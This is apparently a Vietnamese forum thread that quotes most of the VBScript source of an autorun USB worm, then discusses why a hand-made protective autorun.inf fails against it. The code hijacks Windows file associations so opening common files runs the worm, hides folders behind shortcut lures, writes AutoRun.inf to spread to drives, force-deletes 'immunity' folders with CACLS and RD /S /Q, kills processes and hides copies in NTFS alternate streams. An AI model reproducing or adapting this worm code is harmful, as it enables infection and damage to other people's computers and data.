If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfi le\shell\open\command\") <> File_Value Then
Call SetCmdFileAss(VirusAssPath)
End If

If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfi le\shell\open\command\") <> File_Value Then
Call SetRegFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.f ile\shell\open\command\") <> File_Value Then
Call SetchmFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfi le\shell\open\command\") <> File_Value Then
Call SethlpFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Appli cations\iexplore.exe\shell\open\command\") <> IE_Value Then
Call SetIEAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\") <> IE_Value Then
Call SetIEAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command\") <> MyCpt_Value1 Then
Call SetMyComputerAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command\") <> MyCpt_Value2 Then
Call SetMyComputerAss(VirusAssPath)
End If
Call RegSet()
End Sub
Sub CopyFile(source, pathf)
on Error Resume Next
If FSO.FileExists(pathf) Then
FSO.DeleteFile pathf , True
End If
FSO.CopyFile source, pathf
End Sub
Sub CreateFile(code, pathf)
on Error Resume Next
Dim FileText
If FSO.FileExists(pathf) Then
Set FileText = FSO.OpenTextFile(pathf, 2, False)
FileText.Write code
FileText.Close
Else
Set FileText = FSO.OpenTextFile(pathf, 2, True)
FileText.Write code
FileText.Close
End If
End Sub
Sub CreateFile(code, pathf)
on Error Resume Next
Dim FileText
If FSO.FileExists(pathf) Then
Set FileText = FSO.OpenTextFile(pathf, 2, False)
FileText.Write code
FileText.Close
Else
Set FileText = FSO.OpenTextFile(pathf, 2, True)
FileText.Write code
FileText.Close
End If
End Sub
Sub RegSet()
on Error Resume Next
Dim RegPath1 , RegPath2, RegPath3, RegPath4
RegPath1 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Explorer\Advanced\Folder\Hidden\NOHIDD EN\CheckedValue"
RegPath2 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Explorer\Advanced\Folder\Hidden\SHOWAL L\CheckedValue"
RegPath3 = "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoDriveTypeAutoRun"
RegPath4 = "HKEY_CLASSES_ROOT\lnkfile\IsShortcut"
Call WriteReg (RegPath1, 3, "REG_DWORD")
Call WriteReg (RegPath2, 2, "REG_DWORD")
Call WriteReg (RegPath3, 0, "REG_DWORD")
Call DeleteReg (RegPath4)
End Sub
Sub KillProcess(ProcessNames)
on Error Resume Next
Set WMIService = GetObject("winmgmts:\\.\root\cimv2")
For Each ProcessName In ProcessNames
Set ProcessList = WMIService.execquery(" Select * From win32_process where name ='" & ProcessName & "' ")
For Each Process In ProcessList
IntReturn = Process.terminate
If intReturn <> 0 Then
WshShell.Run "CMD /c ntsd -c q -p " & Process.Handle, vbHide, False
End If
Next
Next
End Sub
Sub KillImmunity(D)
on Error Resume Next
ImmunityFolder = D & ":\Autorun.inf"
If Fso.FolderExists(ImmunityFolder) Then
WshSHell.Run ("CMD /C CACLS " & """" & ImmunityFolder & """" & " /t /e /c /g everyone:f"),vbHide,True
WshSHell.Run ("CMD /C RD /S /Q " & ImmunityFolder), vbHide, True
End If
End Sub
Sub KeepProcess(VBSFullNames)
on Error Resume Next
For Each VBSFullName In VBSFullNames
If VBSProcessCount(VBSFullName) < 2 Then
Run("%SystemRoot%\system\svchost.exe " & VBSFullName)
End If
Next
End Sub
Function GetSystemDrive()
GetSystemDrive = Left(Fso.GetSpecialFolder(0),2)
End Function
Function GetFileSystemType(Drive)
Set d = FSO.GetDrive(Drive)
GetFileSystemType = d.FileSystem
End Function
Function ReadReg(strkey)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
ReadReg = tmps.RegRead(strkey)
Set tmps = Nothing
End Function
Sub WriteReg(strkey, Value, vtype)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
If vtype = "" Then
tmps.RegWrite strkey, Value
Else
tmps.RegWrite strkey, Value, vtype
End If
Set tmps = Nothing
End Sub
Sub DeleteReg(strkey)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
tmps.RegDelete strkey
Set tmps = Nothing
End Sub
Sub SetHiddenAttr(path)
on Error Resume Next
Dim vf
Set vf = FSO.GetFile(path)
Set vf = FSO.GetFolder(path)
vf.Attributes = 6
End Sub
Sub Run(ExeFullName)
on Error Resume Next
Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run ExeFullName
Set WshShell = Nothing
End Sub
Sub InfectRoot(D,VirusName)
on Error Resume Next
Dim VBSCode
VBSCode = GetCode(WScript.ScriptFullName)
VBSPath = D & ":\" & VirusName
If FSO.FileExists(VBSPath) = False Then
Call CreateFile(VBSCode, VBSPath)
Call SetHiddenAttr(VBSPath)
End If
Set Folder = Fso.GetFolder(D & ":\")
Set SubFolders = Folder.Subfolders
For Each SubFolder In SubFolders
SetHiddenAttr(SubFolder.Path)
LnkPath = D & ":\" & SubFolder.Name & ".lnk"
TargetPath = D & ":\" & VirusName
Args = """" & D & ":\" & SubFolder.Name & "\Dir"""
If Fso.FileExists(LnkPath) = False or GetTargetPath(LnkPath) <> TargetPath Then
If Fso.FileExists(LnkPath) = True Then
FSO.DeleteFile LnkPath, True
End If
Call CreateShortcut(LnkPath,TargetPath,Args)
End If
Next
End Sub
Sub CreateShortcut(LnkPath,TargetPath,Args)
Set Shortcut = WshShell.CreateShortcut(LnkPath)
With Shortcut
.TargetPath = TargetPath
.Arguments = Args
.WindowStyle = 4
.IconLocation = "%SystemRoot%\System32\Shell32.dll, 3"
.Save
End With
End Sub
Sub CreateAutoRun(D,VirusName)
on Error Resume Next
Dim InfPath, VBSPath, VBSCode
InfPath = D & ":\AutoRun.inf"
VBSPath = D & ":\" & VirusName
VBSCode = GetCode(WScript.ScriptFullName)
If FSO.FileExists(InfPath) = False or FSO.FileExists(VBSPath) = False Then
Call CreateFile(VBSCode, VBSPath)
Call SetHiddenAttr(VBSPath)
StrInf = "[AutoRun]" & vbCrLf & "Shellexecute=WScript.exe " & VirusName & " ""AutoRun""" & vbCrLf & "shell\open=´ò¿ª(&O)" & vbCrLf & "shell\open\command=WScript.exe " & VirusName & " ""AutoRun""" & vbCrLf & "shell\open\Default=1" & vbCrLf & "shell\explore=×ÊÔ´¹ÜÀíÆ÷(&X)" & vbCrLf & "shell\explore\command=WScript.exe " & VirusName & " ""AutoRun"""
Call KillImmunity(D)
Call CreateFile(StrInf, InfPath)
Call SetHiddenAttr(InfPath)
End If
End Sub
Sub SetTxtFileAss(sFilePath)
on Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtf ile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetIniFileAss(sFilePath)
on Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inif ile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetInfFileAss(sFilePath)
on Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inff ile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetBatFileAss(sFilePath)
on Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batf ile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetCmdFileAss(sFilePath)
on Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdf ile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SethlpFileAss(sFilePath)
on Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpf ile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetRegFileAss(sFilePath)
on Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regf ile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetchmFileAss(sFilePath)
on Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm. file\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetIEAss(sFilePath)
on Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " OIE "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Appl ications\iexplore.exe\shell\open\command\", Value, "REG_EXPAND_SZ")
Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetMyComputerAss(sFilePath)
on Error Resume Next
Dim Value1,Value2
Value1 = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " OMC "
Value2 = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " EMC "
Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\", "", "REG_SZ")
Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command\", Value1, "REG_EXPAND_SZ")
Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command\", Value2, "REG_EXPAND_SZ")
End Sub
Function GetSerialNumber(Drv)
on Error Resume Next
Set d = fso.GetDrive(Drv)
GetSerialNumber = d.SerialNumber
GetSerialNumber = Replace(GetSerialNumber,"-","")
End Function
Function GetMainVirus(N)
on Error Resume Next
MainVirusName = GetSerialNumber(GetSystemDrive()) & ".vbs"
If GetFileSystemType(GetSystemDrive()) = "NTFS" Then
If N = 1 Then
GetMainVirus = Fso.GetSpecialFolder(N) & "\smss.exe:" & MainVirusName
End If
If N = 0 Then
GetMainVirus = Fso.GetSpecialFolder(N) & "\explorer.exe:" & MainVirusName
End If
Else
GetMainVirus = Fso.GetSpecialFolder(N) & "\" & MainVirusName
End If
End Function
Function VBSProcessCount(VBSPath)
on Error Resume Next
Dim WMIService, ProcessList, Process
VBSProcessCount = 0
Set WMIService = GetObject("winmgmts:\\.\root\cimv2")
Set ProcessList = WMIService.ExecQuery("Select * from Win32_Process Where " & "Name='cscript.exe' or Name='wscript.exe' or Name='svchost.exe'")
For Each Process In ProcessList
If InStr(Process.CommandLine, VBSPath) > 0 Then
VBSProcessCount = VBSProcessCount + 1
End If
Next
End Function
Function PreDblInstance()
on Error Resume Next
PreDblInstance = False
If VBSProcessCount(WScript.ScriptFullName) >= 3 Then
PreDblInstance = True
End If
End Function
Function GetTargetPath(LnkPath)
on Error Resume Next
Dim Shortcut
Set Shortcut = WshShell.CreateShortcut(LnkPath)
GetTargetPath = Shortcut.TargetPath
End Function
Function GetCode(FullPath)
on Error Resume Next
Dim FileText
Set FileText = FSO.OpenTextFile(FullPath, 1)
GetCode = FileText.ReadAll
FileText.Close
End Function
Function GetVersion()
Dim VerInfo
VerInfo = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"
If ReadReg(VerInfo) = "" Then
GetVersion = 0
Else
GetVersion = CInt(ReadReg(VerInfo))
End If
End Function
Sub VirusAlert()
on Error Resume Next
Dim HtaPath,HtaCode
HtaPath = Fso.GetSpecialFolder(1) & "\BFAlert.hta"
HtaCode = "" & vbCrLf & "" & vbCrLf & "

" & vbCrLf & "N
" & vbCrLf & "nuke " & vbCrLf & "

"
If FSO.FileExists(HtaPath) = False Then
Call CreateFile(HtaCode, HtaPath)
Call SetHiddenAttr(HtaPath)
End If
Call Run(HtaPath)
End Sub
Function GetInfectedDate()
on Error Resume Next
Dim DateInfo
DateInfo = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"
If ReadReg(DateInfo) = "" Then
GetInfectedDate = ""
Else
GetInfectedDate = CDate(ReadReg(DateInfo))
End If
End Function
Sub MakeJoke(Times)
on Error Resume Next
Dim WMP, colCDROMs
Set WMP = CreateObject("WMPlayer.OCX")
Set colCDROMs = WMP.cdromCollection
If colCDROMs.Count > 0 Then
For i = 1 To Times
colCDROMs.Item(0).eject()
WScript.Sleep 3000
colCDROMs.Item(0).eject()
Next
End If
Set WMP = Nothing
End Sub

Mình nghĩ các bạn làm phức tạp hóa vấn đề về file atuorun.inf. Cứ login vào bằng administrator, vào tools/folder options.../view, unchecked vào Use simple file sharing, bật ẩn file, bật hiển thị đuôi file, rồi làm ra (tạo) file autorun.inf, vào thuộc tính của file, mục general chọn read only, hidden, mục securiy deny full control của tất cả các user/group khác, đặt mật (an ninh) khẩu cho administrator là ok.

Còn driver đó là driver sưu tập từ driver của hầu hết các main thông dụng rồi nén lại bằng 7zip có dung lượng dưới 100Mb, còn khi bung ra thì gần đầy 1 đĩa CD, bất thể nói là main tạm thời (gian) được, không 1 ai có thể tự làm ra (tạo) ra driver ngoài hãng sản xuất phần cứng đó mà nó nhận được cả.

Quote:

Được gửi bởi chimboica

Mình nghĩ các bạn làm phức tạp hóa vấn đề về file atuorun.inf. Cứ login vào bằng administrator, vào tools/folder options.../view, unchecked vào Use simple file sharing, bật ẩn file, bật hiển thị đuôi file, rồi làm ra (tạo) file autorun.inf, vào thuộc tính của file, mục general chọn read only, hidden, mục securiy deny full control của tất cả các user/group khác, đặt mật (an ninh) khẩu cho administrator là ok.

Không phải là làm phức tạp hóa vấn đề mà là bạn nghĩ vấn đề nó đơn giản quá. tui vừa nói rồi, vừa là virus thì hầu hết trước khi nhiễm nó đều lưu tất cả các thuộc tính của file chuẩn bị lây và sau đó là nó sẽ đặt lại thuộc tính để có thể làm gì thì làm, sau khi lây xong nó lại trả lại thuộc tính như ban đầu. Tuy nhiên, con virus Autorun này thì có hơi khác, phiên bản sau này nó cũng chẳng cần kiểm tra và lưu thuộc tính làm gì, nó cứ chép nguyên bản file autorun.inf vào ổ đĩa sau 1 khoảng thời (gian) gian hay có thao tác nào đó với ổ đĩa cho dù trên ổ đó vừa có chính file autorun.inf của nó rồi.
Cách của bạn cũng bất ăn thua đâu, sau khi làm ra (tạo) xong file autorun.inf như bạn chỉ dẫn bạn thử down cái tiện ích này về xem có xóa được không?

Hay nếu bất có tiện ích nào thì bạn thử dùng câu lệnh này xem sao
cacls c:\autorun.inf /P: everyone:f (ở đây là file autorun.inf bạn để ở trên ổ C
Khi nó hỏi Are you sure ? bạn ấn chữ Y trên bàn phím rồi xóa thử file đó xem sao?
Còn virus Autorun ư? Nó làm tự động hết bằng câu lệnh DOS: CMD /C
đây là 2 dòng code trích ở bên trên để virus đặt lại thuộc tính Full control cho everyone:
WshSHell.Run ("CMD /C CACLS " & """" & ImmunityFolder & """" & " /t /e /c /g everyone:f"),vbHide,True
WshSHell.Run ("CMD /C RD /S /Q " & ImmunityFolder), vbHide, True

Thank nhiều nhé! Mình đang cần tìm phiên bản mới này.
Mà cho mình xin phép được đổi bản quyền tác giả trong đĩa nhé.